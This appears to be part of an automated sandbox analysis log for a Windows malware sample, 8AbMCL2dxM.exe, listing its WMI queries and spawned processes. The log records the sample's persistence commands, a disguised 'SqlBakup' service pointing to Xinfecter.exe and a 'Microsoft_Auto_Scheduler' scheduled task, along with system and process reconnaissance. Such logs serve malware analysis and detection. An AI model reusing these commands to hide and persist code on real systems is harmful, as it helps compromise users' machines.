        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="928"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="996"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="436"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="376"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="60"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="980"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1040"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1064"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1140"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1192"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1248"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1344"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1356"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1448"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1516"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1528"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1560"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1648"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1784"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1872"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1900"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1988"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2000"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1704"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2076"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2088"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2148"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2236"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2288"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2424"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2560"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2600"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2648"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2692"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2764"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2916"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3008"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3624"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3668"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3808"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3952"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4168"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4356"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4400"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4804"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5416"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6016"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5188"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5428"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1888"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5312"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6296"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2260"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2752"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5988"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5796"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2436"::GetOwner
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="516"::GetOwner
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 8AbMCL2dxM.exe | ReversingLabs: Detection: 76%
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File read: C:\Users\user\Desktop\8AbMCL2dxM.exe
        Source: unknown | Process created: C:\Users\user\Desktop\8AbMCL2dxM.exe "C:\Users\user\Desktop\8AbMCL2dxM.exe"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\systeminfo.exe | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
